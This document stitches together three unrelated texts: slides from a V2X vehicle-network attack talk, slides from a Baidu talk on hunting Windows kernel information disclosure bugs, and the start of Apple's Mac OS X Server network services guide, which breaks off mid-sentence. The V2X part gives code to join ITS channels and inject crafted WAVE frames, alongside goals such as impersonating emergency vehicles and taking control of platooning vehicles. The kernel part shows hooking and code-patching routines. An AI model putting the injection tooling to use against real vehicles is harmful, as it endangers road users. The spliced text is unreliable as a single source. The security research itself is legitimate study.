Attacks propagate easily across network
Entry point to all systems connected to V2X infrastructure
Manipulation of traffic control systems: lights, bridges
Public transportation
Tolling and financial systems
DSRC interface acts as entry point to onboard systems
Wireless access to vehicle control BUS
Transport malware across trafficked borders
Privilege escalation in PKI
Hijacking emergency vehicle authority
Certificate revocation via RSU
Understanding the Adversary: Passive
Determine trajectory of cars within some radius
Few stations required to monitor a typical highway
Enumerate services provided by peers
Characterize network traffic patterns within regions
Uniquely fingerprint network participants independent of PKI
RF signature
Probe responses
Behavior patterns
Perform arbitrage on economic markets
Understanding the Adversary: Active
Denial of service, MITM
Impersonate infrastructure point
Manipulate misbehavior reports
Disrupt vehicle traffic
Target specific platforms and individuals
Economic warfare: manipulation of supply/distribution networks
Behavior modeling and manipulation
Privilege escalation in VANET
Parade as an emergency vehicle or moving toll station
Ad hoc PKI for application-layer services
Assume vehicle control via platooning service
V2X Threat Model: Applied
Network traffic can be corrupted over-the-air
Ad hoc PKI can allow certificate hijacking
Diagnostic services in DSRC implementation expose vehicle control
network
Valid DSRC messages can pass malicious instructions to infotainment
BUS
Fingerprinting possible regardless of PKI pseudonym scheme
Trust management services vulnerable to manipulation
Misbehavior reporting
Certificate revocation
Denial of P2P certificate distribution
Our Solution: Just Use Linux
Platform-independent* V2X stack integrated in mainline Linux kernel
No proprietary DSRC hardware/software required - uses COTS hw
Extensible in generic Linux environment
*Currently supports ath9k
Implements 802.11p, IEEE 1609.{3,4} in Linux networking subsystem
mac80211, cfg80211, nl80211
1609 module to route WSMP frames
Underlying 802.11 architecture compatible with Linux networking
subsystem
Mainline kernel integration leads to immediate global deployment
This enables rapid driver integration
SocketV2V: Implementing 802.11p in Linux Kernel
Add driver support for
ITS 5.825-5.925GHz
band
Define ITS 5.8-5.9GHz
channels
SocketV2V: Implementing 802.11p in Linux Kernel
Modify kernel
and userspace
local regulatory
domain
Force use of
user-specified regulatory
domain
SocketV2V: Implementing 802.11p in Linux Kernel
Enable filtering
for 802.11p
frames
Require use of
wildcard BSSID
SocketV2V: Userspace Utility Modifications for 802.11p
Add iw command
for joining 5GHz
ITS channels
using OCB
Add iw
definitions for
5/10MHz-width
channels in OCB
Use iw to join
ITS spectrum
with COTS WiFi
hardware!
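The userspace steps can be scripted. The helper below only assembles the command lines; the `set type ocb` and `ocb join <freq> <5MHZ|10MHZ>` syntax matches recent iw releases, but treat the exact flags as an assumption that may vary by iw version:

```python
def ocb_join_cmds(dev, freq_mhz=5900, width="10MHZ"):
    """Assemble the iw/ip invocations that put a COTS adapter on an ITS
    channel: bring the link down, switch to OCB mode, bring it up, join."""
    if width not in ("5MHZ", "10MHZ"):
        raise ValueError("802.11p uses 5 or 10 MHz channels")
    return [
        ["ip", "link", "set", dev, "down"],
        ["iw", "dev", dev, "set", "type", "ocb"],
        ["ip", "link", "set", dev, "up"],
        ["iw", "dev", dev, "ocb", "join", str(freq_mhz), width],
    ]
```

Each list can be handed to `subprocess.run` on a box with root privileges and an OCB-capable driver (such as the patched ath9k the slides describe).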
SocketV2V: Implementing WAVE in Linux
Functions to pack, parse, and broadcast messages
Relevant data structures
WSM, WSA, WRA, SII, CII, IEX
Full control of fields
subtype, TPID, PSID, chan, tx power, data rate, location, etc.
Operating modes for setting degree of compliance to standard (strict,
lax, loose)
Channel switching, dispatch
Netlink socket interface to userspace
Userspace link to the 802.11p kernel routines
Manage channel switching using iw
WAVE Usage
Message fields set in struct wsmp wsm
WSMs encoded to bitstream through wsmp wsm encode
WSM bitstream decoded through wsmp wsm decode
Functions for generating random WSMP frames to specified
compliance
Opens socket to 802.11p wireless interface
Inject WSMs with prefix EtherType 0x86DC
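For reference, injection boils down to prepending an Ethernet header with that EtherType to the serialized WSM. The sketch below is a deliberately simplified illustration: the real IEEE 1609.3 encoding uses variable-length fields and option indicators, so the exact header layout, the fixed 16-bit length field, and the example PSID here are assumptions, not the stack's actual encoder.

```python
import struct

def p_encode_psid(psid):
    """P-encode a PSID; only the 1-byte form (psid < 0x80) is sketched."""
    if psid >= 0x80:
        raise NotImplementedError("multi-byte p-encoding not sketched here")
    return bytes([psid])

def build_wsm(payload, psid=0x20, version=3):
    """Assemble a minimal WAVE Short Message with a simplified field layout."""
    hdr = bytes([version & 0x0F])           # subtype/version byte (simplified)
    hdr += bytes([0x00])                    # TPID 0: PSID addressing, no options
    hdr += p_encode_psid(psid)
    hdr += struct.pack(">H", len(payload))  # WSM length, sketched as plain 16-bit
    return hdr + payload

def build_frame(payload, src, dst=b"\xff" * 6, ethertype=0x86DC):
    """Wrap the WSM in a raw Ethernet frame; the slides use EtherType 0x86DC."""
    return dst + src + struct.pack(">H", ethertype) + build_wsm(payload)
```

`build_frame(b"...", src=...)` yields raw bytes that could be handed to a packet injector (for example pcap_inject, as the slides do).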
WAVE Structs: WSM
WAVE Short
Message:
message
encapsulation
and forwarding
parameters
(N-hop, flooding)
WAVE Structs: IEX
Information
Element
Extension:
optional fields for
RF, routing, and
services
(More) WAVE Structs
SocketV2V: Implementing J2735
SocketV2V: Implementing J2735
Generate WSM
Pack J2735 msg in
WSM data element
Serialize WSM
Tx using
pcap inject!
SocketV2V: Implementing J2735
Wireshark WSMP plugin incomplete per current 1609 encoding
SocketV2V: Implementing J2735
Future Pwning of ITS: You Wanna be a Master?
Level 1: Denial of Service
Single-antenna DSRC systems susceptible to collision attack
Level 2: DSRC spectrum sweep, enumerate proprietary (custom)
services available per participant
Level 3: Impersonate an emergency vehicle
Level 4: Become mobile tollbooth
Level 1337: Remotely execute platooning service
Assume direct control
Additional Forms of Pwning
Pandora’s box:
Mass dissemination of malware
Passive surveillance with
minimal effort
Extract RF parameters for
imaging
Reverse engineer system
architectures given enough data
Epidemic propagation model
Built in protocol switching
Exfiltration over comm
bridges!
Developing Connected Vehicle Technologies
Widespread access enables engagement of security (1337) community
in standards development
Interact with existing V2X infrastructure
Pressure manufacturers and OEMs to implement functional V2V
Deploy ahead of market - experimental platforms
UAS, maritime, orbital, heavy vehicles
Opportunity for empirical research: See what you can break
Straightforward to wardrive
Hook DIY radio (Pi Zero with 5GHz USB adapter) into CANBUS (for
science ONLY)
Acknowledgments
References
Check me out on GitHub: https://github.com/p3n3troot0r/socketV2V
Estimated Benefits of Connected Vehicle Applications – Dynamic Mobility
Applications, AERIS, V2I Safety, and Road Weather Management Applications –
U.S. Department of Transportation, 2015
Vehicle-to-Vehicle Communications: Readiness of V2V Technology for Application
– U.S. Department of Transportation, National Highway Traffic Safety
Administration, 2014
William Whyte, Jonathan Petit, Virendra Kumar, John Moring and Richard Roy,
”Threat and Countermeasures Analysis for WAVE Service Advertisement,” IEEE
18th International Conference on Intelligent Transportation Systems, 2015
E. Donato, E. Madeira and L. Villas, ”Impact of desynchronization problem in
1609.4/WAVE multi-channel operation,” 2015 7th International Conference on
New Technologies, Mobility and Security (NTMS), Paris, 2015, pp. 1-5.
Papernot, Nicolas, et al. ”Practical black-box attacks against deep learning systems
using adversarial examples.”
How to Find 12 Kernel Information Disclosure Vulnerabilities in 3 Months
Tanghui Chen, Long Li, Baidu Security Lab
2019
Agenda
0. Who we are
1. Understanding the vulnerability class
2. Researching the vulnerabilities
• Heap/stack data poisoning
• Detection techniques
• CVE case studies
3. Results
4. Summary and reflections
Who am I?
• Senior security R&D engineer at Baidu Security Lab
• Designer and lead of the proactive defense in Baidu Antivirus and Baidu Guard
• 10+ years of Windows kernel research and development experience
• Deep rootkit expertise: strong internals background and distinctive techniques
• Wandered into vulnerability hunting by accident
Tanghui Chen
[email protected]
What is a kernel information disclosure vulnerability?
The Windows kernel contains many information disclosure vulnerabilities that can lead to KASLR bypass or
leakage of critical system state. An attacker can use them to obtain important information, for example:
• Encryption keys
• Kernel objects
• Addresses of key modules
• ...
How do these vulnerabilities arise?
Take CVE-2018-8443 as an example:
1. User mode calls ZwDeviceIoControlFile(..., 0x7d008004, Output, ...)
2. ZwDeviceIoControlFile enters the kernel through the system call path
3. Back in user mode, Output contains uninitialized data from the kernel stack
Existing hunting techniques
• BochsPwn
❑ CPU instruction emulation
• DigTool
❑ heavyweight VT (hardware virtualization)
• Binary instrumentation
• ...
How we hunt information disclosure vulnerabilities
Step 1: heap/stack data poisoning
• Hook KiFastCallEntry to poison the kernel stack
• Hook ExAllocatePoolWithTag to poison the kernel heap
• Fill the heap and stack memory with a magic pattern such as 0xAA
In the KiFastCallEntry hook, obtain the kernel stack range via IoGetStackLimits and fill it with the marker:
IoGetStackLimits(&LowLimit, &HighLimit);
__asm{
xor eax, eax;
mov al, g_cFlags; //0xAA
mov edi, LowLimit;
mov ecx, Esp_Value;
sub ecx, LowLimit;
cld;
rep stosb;
}
Stack poisoning
When memory is allocated via ExAllocatePoolWithTag, fill the new buffer with the marker:
PVOID NTAPI HOOK_ExAllocatePoolWithTag(...)
{
PVOID Buffer = NULL;
Buffer = pfn_ExAllocatePoolWithTag(PoolType, NumberOfBytes, Tag);
if (Buffer){
memset(Buffer, g_cFlags, NumberOfBytes); //initialize the allocation with the marker, e.g. 0xAA
}
return Buffer;
}
Heap poisoning
Thoughts on Heap/Stack Poisoning
• The poisoning itself is simple; neither the heap nor the stack variant is inherently better
• Memory may legitimately contain bytes equal to the marker, so false positives are possible
• Randomizing the marker value reduces false positives
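To make the false-positive point concrete, here is a small user-mode C sketch. It is our own illustration: the excluded byte values and the run-length threshold are arbitrary choices, not part of the original tool. The marker is randomized per run, and a hit is only reported for a run of consecutive marker bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Pick a fresh marker byte per run; avoid 0x00 and 0xFF, which occur
 * constantly in real memory and would flood the tool with false hits. */
static unsigned char pick_marker(unsigned int seed)
{
    unsigned char m;
    srand(seed);
    do {
        m = (unsigned char)(rand() & 0xFF);
    } while (m == 0x00 || m == 0xFF);
    return m;
}

/* Report a hit only when at least 'min_run' consecutive marker bytes
 * are found, which further cuts down coincidental matches. */
static int has_marker_run(const unsigned char *buf, size_t len,
                          unsigned char marker, size_t min_run)
{
    size_t run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == marker) ? run + 1 : 0;
        if (run >= min_run) return 1;
    }
    return 0;
}
```

A fresh marker per boot (or per scan) means a coincidental match must guess a different value each time, which is what drives the false-positive rate down.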
Step 2: Data Detection Techniques
Detection techniques based on CPU instruction emulation and VT already exist.
Is there a simpler way?
Detection Techniques We Explored
Our exploration produced three new detection techniques:
• Nirvana (applied to kernel information disclosure hunting for the first time)
• memcpy/memmove, hereafter memcpy (the most lightweight method)
• movsd
Nirvana Overview
Nirvana is a lightweight dynamic translation framework from Microsoft that can monitor and control the execution of a running process without recompiling or rebuilding any code in that process (from "Hooking Nirvana" by Alex Ionescu). We applied it to kernel information disclosure hunting for the first time.
Through Nirvana we can register a callback that fires whenever a system call returns to user mode, and scan the stack data inside that callback.

ZwSetInformationProcess(NtCurrentProcess(), ProcessInstrumentationCallback, &Info64, sizeof(Info64));

typedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION{
    ULONG_PTR Version;
    ULONG_PTR Reserved;
    ULONG_PTR Callback;
}PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;
Implementing Nirvana-Based Detection

__declspec (naked) VOID InstrumentationCallback()
{
    __asm{
        // some code omitted...
        mov eax, fs:[0x8];
        mov edi, fs:[0x4];
        cmp dword ptr[eax], g_cFlag;   // e.g. 0xAAAAAAAA
        jz __find;
        add eax, 4;
        cmp eax, edi;
        // some code omitted...
        jmp dword ptr fs:[0x1B0];
    }
}
A Leak Scene Captured by Nirvana
Advantages of Nirvana-Based Detection
• Supported on every Windows release since Vista
• Uses a system-provided interface, so the implementation is very simple
• Good compatibility
Limitations of Nirvana-Based Detection
• Detects only stack data; heap data is almost impossible to check
• Cannot capture the leak as it happens, which makes analysis and PoC writing harder
memcpy
• The Windows kernel generally writes data to user mode with memcpy/memmove
[Figure: kernel-space memory is copied to user-space memory via memcpy(dst, src, size); the detection hook sits on that copy]
Implementing memcpy-Based Detection
Hook memcpy/memmove, then check whether dst is user-mode memory and whether the source data contains the marker:

void * __cdecl HOOK_memcpy( void * dst, void * src, size_t count)
{
    // some code omitted...
    if ((ULONG_PTR)dst < MmUserProbeAddress){
        if ((ULONG_PTR)src > MmSystemRangeStart){
            pOffset = (PUCHAR)src;
            while (pOffset <= (PUCHAR)src + count - sizeof(DWORD)){
                if (*(DWORD *)pOffset == g_dwDwordFlags){
                    // marker found: suspected leak
                }
                pOffset++; // advance the scan pointer (elided on the slide)
            }
        }
    }
    // some code omitted...
}
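Outside the kernel, the hook's inner scan loop can be sketched and tested as plain C. The function below is a hypothetical user-mode model; the MmUserProbeAddress/MmSystemRangeStart range checks from the real hook are omitted because they have no user-mode counterpart.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* User-mode model of the hook's inner loop: scan 'src' for a 32-bit
 * marker pattern before the data would be copied out to user memory. */
static int contains_flag(const unsigned char *src, size_t count, uint32_t flag)
{
    if (count < sizeof(uint32_t)) return 0;
    for (size_t i = 0; i + sizeof(uint32_t) <= count; i++) {
        uint32_t v;
        memcpy(&v, src + i, sizeof(v));   /* unaligned-safe read */
        if (v == flag) return 1;
    }
    return 0;
}
```

Scanning at every byte offset (not just aligned ones) matters: leaked marker bytes can land at any position inside the output buffer.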
memcpy Detection Characteristics
• Simple to implement, with outstanding performance: virtually no overhead
• Good compatibility
• Captures the leak at the moment it happens, making analysis and PoC writing easy
• Strong advantages, almost no drawbacks
A Closer Look at memcpy
• When size is a variable, memcpy is called directly
• When size is a constant, the memcpy call is optimized away
• When size is a large constant, it is optimized into movsd
• memmove is never optimized this way
Exploring movsd-Based Detection
• What does memcpy get optimized into?
• Ultimately it compiles down to the movsd instruction
• Detecting data at movsd covers the few cases that the memcpy hook misses
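The byte-for-byte patch described on the next slide is easy to model in user mode. The sketch below is our own illustration: it swaps every F3 A5 pair for CD 20 in a buffer. A real implementation must walk instruction boundaries, since a naive byte scan can also hit F3 A5 appearing inside longer instructions or data.

```c
#include <assert.h>
#include <stddef.h>

/* Model of the code-section pass: every two-byte "rep movsd" opcode
 * (F3 A5) is swapped for "int 20h" (CD 20). The equal two-byte length
 * is what makes an in-place patch possible at all. */
static size_t patch_movsd(unsigned char *code, size_t len)
{
    size_t patched = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        if (code[i] == 0xF3 && code[i + 1] == 0xA5) {
            code[i]     = 0xCD;   /* int */
            code[i + 1] = 0x20;   /* 20h */
            patched++;
            i++;                  /* skip the byte we just rewrote */
        }
    }
    return patched;
}
```

Because both sequences are exactly two bytes, no surrounding code has to move and no relative offsets need fixing up.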
How Can movsd Be Used for Detection?
• movsd (F3 A5) and int 20h (CD 20) are both two-byte sequences
• Scan the code section of the nt module and replace every movsd with int 20h
• Install a custom int 20h interrupt handler, KiTrap20
• Check the memory contents inside KiTrap20

if (*(WORD *)pOffset == 0xA5F3){ // rep movs dword ptr es:[edi], dword ptr [esi]
    MdlBuffer = GetMdlBuffer(&Mdl, pOffset, 2);
    *(WORD *)MdlBuffer = 0x20CD; // int 20
}
Implementing movsd-Based Detection

__declspec (naked) VOID HOOK_KiTrap20()
{
    __asm {
        // some code omitted...
        pushfd;
        pushad;
        call DetectMemory;
        popad;
        popfd;
        rep movs dword ptr es:[edi], dword ptr[esi]; // similar instructions can be handled the same way
        iretd;
    }
    // some code omitted...
}
Implementing movsd-Based Detection

VOID
DetectMemory(PVOID DestAddress, PVOID SrcAddress, SIZE_T Size)
{
    // some code omitted...
    if ((ULONG_PTR)DestAddress < MmUserProbeAddress){
        pOffset = (PUCHAR)SrcAddress;
        if (*(ULONG_PTR *)pOffset == g_dwDwordFlags){
            // marker found: suspected leak
        }
        // some code omitted...
    }
}
movsd Detection Characteristics
• Covers more data than the memcpy hook
• Captures the leak as it happens, making analysis and PoC writing easy
Step 3: Vulnerability Analysis
• When a suspected leak is captured, confirm it live in the debugger
• Let execution return to user mode and check whether the user-mode memory contains the marker; if it does, this is a kernel information disclosure vulnerability
• Write the PoC by analyzing the call stack and reverse engineering the user-mode side of the relevant system call
Vulnerability Analysis
• Some leaked memory passes through multiple copies, which makes analysis and PoC writing very difficult
• We built a dedicated memory-tracking tool to assist the analysis, supporting:
  • Memory tracing
  • Conditional breakpoints on memory
CVE Case Study
• A leak scene captured on Windows 10 build 17134 x64; the vulnerability was assigned CVE-2018-8443
• Trace back into mpssvc.dll and confirm that the user-mode memory contains the marker
• Trace back into mpssvc.dll and locate the code that triggers the vulnerability
• Finally, complete the PoC
Results
• 12 Windows kernel information disclosure vulnerabilities found in just three months, all assigned CVEs
• 7 of those CVEs earned the then-maximum bounty of $5,000 each
Reflections
• Is this all there is? ...
• Make user-mode memory read-only (clear the write bit in the PTE)
• Reverse tracing
• ...
?
Thank you
Tanghui Chen
[email protected]
Mac OS X Server
Network Services
Administration
For Version 10.3 or Later
034-2351_Cvr 9/12/03 10:26 AM Page 1
Apple Computer, Inc.
© 2003 Apple Computer, Inc. All rights reserved.
The owner or authorized user of a valid copy of Mac OS
X Server software may reproduce this publication for the
purpose of learning to use such software. No part of this
publication may be reproduced or transmitted for
commercial purposes, such as selling copies of this
publication or for providing paid for support services.
Use of the “keyboard” Apple logo (Option-Shift-K) for
commercial purposes without the prior written consent
of Apple may constitute trademark infringement and
unfair competition in violation of federal and state laws.
Apple, the Apple logo, AirPort, AppleScript, AppleShare,
AppleTalk, Mac, Mac OS, Macintosh, Power Mac, Power
Macintosh, QuickTime, Sherlock, and WebObjects are
trademarks of Apple Computer, Inc., registered in the
U.S. and other countries.
Adobe and PostScript are trademarks of Adobe Systems
Incorporated.
Java and all Java-based trademarks and logos are
trademarks or registered trademarks of Sun
Microsystems, Inc. in the U.S. and other countries.
UNIX is a registered trademark in the United States and
other countries, licensed exclusively through
X/Open Company, Ltd.
034-2351/9-20-03
LL2351.Book Page 2 Monday, September 8, 2003 2:47 PM
Contents

Preface: How to Use This Guide  5
  What's Included in This Guide  5
  Using This Guide  5
  Setting Up Mac OS X Server for the First Time  6
  Getting Help for Everyday Management Tasks  6
  Getting Additional Information  6

Chapter 1: DHCP Service  7
  Before You Set Up DHCP Service  7
  Setting Up DHCP Service for the First Time  9
  Managing DHCP Service  10
  Monitoring DHCP Service  14
  Where to Find More Information  16

Chapter 2: DNS Service  17
  Before You Set Up DNS Service  18
  Setting Up DNS Service for the First Time  18
  Managing DNS Service  21
  Managing Zones  22
  Managing Records  25
  Monitoring DNS  28
  Securing the DNS Server  30
  Common Network Administration Tasks That Use DNS Service  33
  Configuring BIND Using the Command Line  37
  Where to Find More Information  41

Chapter 3: IP Firewall Service  43
  Understanding Firewall Filters  45
  Setting Up Firewall Service for the First Time  48
  Managing Firewall Service  49
  Monitoring Firewall Service  55
  Practical Examples  57
  Common Network Administration Tasks That Use Firewall Service  59
  Advanced Configuration  60
  Port Reference  63
  Where to Find More Information  66

Chapter 4: NAT Service  67
  Starting and Stopping NAT Service  67
  Configuring NAT Service  68
  Monitoring NAT Service  68
  Where to Find More Information  69

Chapter 5: VPN Service  71
  VPN and Security  72
  Before You Set Up VPN Service  73
  Managing VPN Service  73
  Monitoring VPN Service  76
  Where to Find More Information  77

Chapter 6: NTP Service  79
  How NTP Works  79
  Using NTP on Your Network  80
  Setting Up NTP Service  80
  Configuring NTP on Clients  81
  Where to Find More Information  81

Chapter 7: IPv6 Support  83
  IPv6 Enabled Services  84
  IPv6 Addresses in the Server Admin  84
  IPv6 Addresses  84
  Where to Find More Information  86

Glossary  87
Index  95
Preface
How to Use This Guide
What’s Included in This Guide
This guide consists primarily of chapters that tell you how to administer various
Mac OS X Server network services:
• DHCP
• DNS
• IP Firewall
• NAT
• VPN
• NTP
• IPv6 Support
Using This Guide
Each chapter covers a specific network service. Read any chapter that’s about a service
you plan to provide to your users. Learn how the service works, what it can do for you,
strategies for using it, how to set it up for the first time, and how to administer it over
time.
Also take a look at chapters that describe services with which you’re unfamiliar. You
may find that some of the services you haven’t used before can help you run your
network more efficiently and improve performance for your users.
Most chapters end with a section called “Where to Find More Information.” This section
points you to websites and other reference material containing more information
about the service.
Setting Up Mac OS X Server for the First Time
If you haven’t installed and set up Mac OS X Server, do so now.
• Refer to Mac OS X Server Getting Started for Version 10.3 or Later, the document that came with your software, for instructions on server installation and setup. For many environments, this document provides all the information you need to get your server up, running, and available for initial use.
• Review this guide to determine which services you'd like to refine and expand, to identify new services you'd like to set up, and to learn about the server applications you'll use during these activities.
• Read specific chapters to learn how to continue setting up individual services. Pay particular attention to the information in these sections: "Setup Overview," "Before You Begin," and "Setting Up for the First Time."
Getting Help for Everyday Management Tasks
If you want to change settings, monitor services, view service logs, or do any other
day-to-day administration task, you can find step-by-step procedures by using the
onscreen help available with server administration programs. While all the network
services' administration tasks are also documented in the network services
administration guide, sometimes it's more convenient to retrieve information in
onscreen help form while using your server.
Getting Additional Information
In addition to this document, you’ll find information about Mac OS X Server:
• In Mac OS X Server Getting Started for Version 10.3 or Later, which tells you how to install and set up your server initially.
• At www.apple.com/server.
• In onscreen help on your server.
• In Read Me files on your server CD.
1
DHCP Service
Dynamic Host Configuration Protocol (DHCP) service lets you administer and distribute
IP addresses to client computers from your server. When you configure the DHCP
server, you assign a block of IP addresses that can be made available to clients. Each
time a client computer configured to use DHCP starts up, it looks for a DHCP server on
your network. If a DHCP server is found, the client computer then requests an IP
address. The DHCP server checks for an available IP address and sends it to the client
computer along with a “lease period” (the length of time the client computer can use
the address) and configuration information.
You can use the DHCP module in Server Admin to:
• Configure and administer DHCP service.
• Create and administer subnets.
• Configure DNS, LDAP, and WINS options for client computers.
• View DHCP address leases.
If your organization has more clients than IP addresses, you’ll benefit from using DHCP
service. IP addresses are assigned on an as-needed basis, and when they’re not needed,
they’re available for use by other clients. You can use a combination of static and
dynamic IP addresses for your network if you need to. Read the next section for more
information about static and dynamic allocation of IP addresses.
Organizations may benefit from the features of DHCP service, such as the ability to set
Domain Name System (DNS) and Lightweight Directory Access Protocol (LDAP) options
for client computers without additional client configuration.
Before You Set Up DHCP Service
Before you set up DHCP service, read this section for information about creating
subnets, assigning static and dynamic IP addresses, locating your server on the
network, and avoiding reserved IP addresses.
Creating Subnets
Subnets are groupings of computers on the same network that simplify administration.
You can organize subnets any way that is useful to you. For example, you can create
subnets for different groups within your organization or for different floors of a
building. Once you have grouped client computers into subnets, you can configure
options for all the computers in a subnet at one time instead of setting options for
individual client computers. Each subnet needs a way to connect to the other subnets.
A hardware device called a router typically connects subnets.
Assigning IP Addresses Dynamically
With dynamic allocation, an IP address is assigned for a limited period of time (the lease
time) or until the client computer doesn't need the IP address, whichever comes first. By
using short leases, DHCP can reassign IP addresses on networks that have more
computers than available IP addresses.
Addresses allocated to Virtual Private Network (VPN) clients are distributed much like
DHCP addresses, but they don’t come out of the same range of addresses as DHCP. If
you plan on using VPN, be sure to leave some addresses unallocated by DHCP for use
by VPN. To learn more about VPN, see Chapter 5, “VPN Service,” on page 71.
Using Static IP Addresses
Static IP addresses are assigned to a computer or device once and then don’t change.
You may want to assign static IP addresses to computers that must have a continuous
Internet presence, such as web servers. Other devices that must be continuously
available to network users, such as printers, may also benefit from static IP addresses.
Static IP addresses must be set up manually by entering the IP address on the
computer or device that is assigned the address. Manually configured static IP
addresses avoid possible issues certain services may have with DHCP-assigned
addresses and avoid the delay required for DHCP to assign an address.
Don’t include Static IP address ranges in the range distributed by DHCP.
Locating the DHCP Server
When a client computer looks for a DHCP server, it broadcasts a message. If your DHCP
server is on a different subnet from the client computer, you must make sure the
routers that connect your subnets can forward the client broadcasts and the DHCP
server responses. A relay agent or router on your network that can relay BootP
communications will work for DHCP. If you don’t have a means to relay BootP
communications, you must place the DHCP server on the same subnet as your client.
Interacting With Other DHCP Servers
You may already have other DHCP servers on your network, such as AirPort Base
Stations. Mac OS X Server can coexist with other DHCP servers as long as each DHCP
server uses a unique pool of IP addresses. However, you may want your DHCP server to
provide an LDAP server address for client auto-configuration in managed
environments. AirPort Base Stations can’t provide an LDAP server address. Therefore, if
you want to use the auto-configuration feature, you must set up AirPort Base Stations
in Ethernet-bridging mode and have Mac OS X Server provide DHCP service. If the
AirPort Base Stations are on separate subnets, then your routers must be configured to
forward client broadcasts and DHCP server responses as described previously. If you
wish to provide DHCP service with AirPort Base Stations then you can’t use the client
auto-configuration feature and you must manually enter LDAP server addresses at
client workstations.
Using Multiple DHCP Servers on a Network
You can have multiple DHCP servers on the same network. However, it’s important that
they’re configured properly as to not interfere with each other. Each server needs a
unique pool of IP addresses to distribute.
Assigning Reserved IP Addresses
Certain IP addresses can’t be assigned to individual hosts. These include addresses
reserved for loopback and addresses reserved for broadcasting. Your ISP won’t assign
such addresses to you. If you try to configure DHCP to use such addresses, you’ll be
warned that the addresses are invalid, and you’ll need to enter valid addresses.
Getting More Information on the DHCP Process
Mac OS X Server uses a daemon process called “bootpd” that is responsible for the
DHCP Service’s address allocation. You can learn more about bootpd and its advanced
configuration options by accessing its man page using the Terminal utility.
Setting Up DHCP Service for the First Time
If you used the Setup Assistant to configure ports on your server when you installed
Mac OS X Server, some DHCP information is already configured. You need to follow the
steps in this section to finish configuring DHCP service. You can find more information
about settings for each step in “Managing DHCP Service” on page 10.
Step 1: Create subnets
The following instructions show you how to create a pool of IP addresses that are
shared by the client computers on your network. You create one range of shared
addresses per subnet. These addresses are assigned by the DHCP server when a client
issues a request.
See “Creating Subnets in DHCP Service” on page 10.
Step 2: Set up logs for DHCP service
You can log DHCP activity and errors to help you monitor requests and identify
problems with your server.
DHCP service records diagnostic messages in the system log file. To keep this file from
growing too large, you can suppress most messages by changing your log settings in
the Logging pane of the DHCP service settings. For more information on setting up
logs for DHCP service, see “Setting the Log Detail Level for DHCP Service” on page 15.
Step 3: Start DHCP service
See “Starting and Stopping DHCP Service” on page 10.
Managing DHCP Service
This section describes how to set up and manage DHCP service on Mac OS X Server. It
includes starting service, creating subnets, and setting optional settings like LDAP or
DNS for a subnet.
Starting and Stopping DHCP Service
Follow these steps when starting or stopping DHCP. You must have at least one subnet
created and enabled.
To start or stop DHCP service:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Make sure at least one subnet and network interface is configured and selected.
3 Click Start Service or Stop Service.
When the service is turned on, the Stop Service button is available.
Creating Subnets in DHCP Service
Subnets are groupings of client computers on the same network that may be
organized by location (different floors of a building, for example) or by usage (all
eighth-grade students, for example). Each subnet has at least one range of IP addresses
assigned to it.
To create a new subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Click Add, or double-click an existing subnet.
5 Select the General tab.
6 Enter a descriptive name for the new subnet. (Optional)
7 Enter a starting and ending IP address for this subnet range.
Addresses must be contiguous, and they can’t overlap with other subnets’ ranges.
8 Enter the subnet mask for the network address range.
9 Choose the Network Interface from the pop-up menu.
10 Enter the IP address of the router for this subnet.
If the server you’re configuring now is the router for the subnet, enter this server’s
internal LAN IP address as the router’s address.
11 Define a lease time in hours, days, weeks, or months.
12 If you wish to set DNS, LDAP, or WINS information for this subnet, enter these now.
See “Setting the DNS Server for a DHCP Subnet” on page 12, “Setting LDAP Options for
a Subnet” on page 13, and “Setting WINS Options for a Subnet” on page 13 for more
information.
13 Click Save.
Changing Subnet Settings in DHCP Service
Use Server Admin to make changes to existing DHCP subnet settings. You can change
IP address range, subnet mask, network interface, router, or lease time.
To change subnet settings:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet.
5 Click Edit.
6 Make the changes you want.
These changes can include adding DNS, LDAP, or WINS information. You can also
redefine address ranges or redirect the network interface that responds to DHCP
requests.
7 Click Save.
Deleting Subnets From DHCP Service
You can delete subnets and subnet IP address ranges when they will no longer be
distributed to clients.
To delete subnets or address ranges:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select a subnet.
4 Click Delete.
5 Click Save to confirm the deletion.
Changing IP Address Lease Times for a Subnet
You can change how long IP addresses in a subnet are available to client computers.
To change the lease time for a subnet address range:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet range and click Edit.
5 Select the General tab.
6 Select a time scale from the Lease Time pop-up menu (hours, days, weeks, or months).
7 Enter a number in the Lease Time field.
8 Click Save.
Setting the DNS Server for a DHCP Subnet
You can decide which DNS servers and default domain name a subnet should use.
DHCP service provides this information to the client computers in the subnet.
To set DNS options for a subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet and click Edit.
5 Select the DNS tab.
6 Enter the default domain of the subnet.
7 Enter the primary and secondary name server IP addresses you want DHCP clients to
use.
8 Click Save.
Setting LDAP Options for a Subnet
You can use DHCP to provide your clients with LDAP server information rather than
manually configuring each client’s LDAP information. The order in which the LDAP
servers appear in the list determines their search order in the automatic Open Directory
search policy.
If you are using this Mac OS X Server as an LDAP master, the LDAP options will be
pre-populated with the necessary configuration information. If your LDAP master
server is another machine, you’ll need to know the domain name or IP address of the
LDAP database you want to use. You also will need to know the LDAP search base.
To set LDAP options for a subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet and click Edit.
5 Click the LDAP tab.
6 Enter the domain name or IP address of the LDAP server for this subnet.
7 Enter the search base for LDAP searches.
8 Enter the LDAP port number, if you’re using a non-standard port.
9 Select LDAP over SSL, if necessary.
10 Click Save.
Setting WINS Options for a Subnet
You can give additional information to client computers running Windows in a subnet
by adding the Windows-specific settings to the DHCP supplied network configuration
data. These Windows-specific settings allow Windows clients to browse their Network
Neighborhood.
You must know the domain name or IP address of the WINS/NBNS primary and
